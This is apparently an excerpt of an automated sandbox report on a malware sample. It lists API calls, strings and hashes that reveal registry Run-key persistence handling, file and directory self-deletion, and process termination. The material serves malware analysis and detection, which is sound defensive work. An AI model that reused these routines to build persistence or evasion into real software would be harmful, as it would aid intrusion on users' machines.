                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer__onexit
                                                                                          • String ID: ,kG$0kG
                                                                                          • API String ID: 1881088180-2015055088
                                                                                          • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                          • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                          • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                          • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A6C
                                                                                          • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                                                                          Strings
                                                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteOpenValue
                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                          • API String ID: 2654517830-1051519024
                                                                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                          • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                          • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                          APIs
                                                                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteDirectoryFileRemove
                                                                                          • String ID: pth_unenc
                                                                                          • API String ID: 3325800564-4028850238
                                                                                          • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                          • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                          • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                          • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                          APIs
                                                                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ObjectProcessSingleTerminateWait
                                                                                          • String ID: pth_unenc
                                                                                          • API String ID: 1872346434-4028850238
                                                                                          • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                          • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                          • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                          • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountInfoInputLastTick
                                                                                          • String ID: NG
                                                                                          • API String ID: 3478931382-1651712548
                                                                                          • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                                          • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                                                                                          • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                                          • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                          • GetLastError.KERNEL32 ref: 00440D85
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 1717984340-0
                                                                                          • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                          • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                          • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                          • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                          APIs
                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                          • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastRead
                                                                                          • String ID:
                                                                                          • API String ID: 4100373531-0
                                                                                          • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                          • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                          • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                          • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99